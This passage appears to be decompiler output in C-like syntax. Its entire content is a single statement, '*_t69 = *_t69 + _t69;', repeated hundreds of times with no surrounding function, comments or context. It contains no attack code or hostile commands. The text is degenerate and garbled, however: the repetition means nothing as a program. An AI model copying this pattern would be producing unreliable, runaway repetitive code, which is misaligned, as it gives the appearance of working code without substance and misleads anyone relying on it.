				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
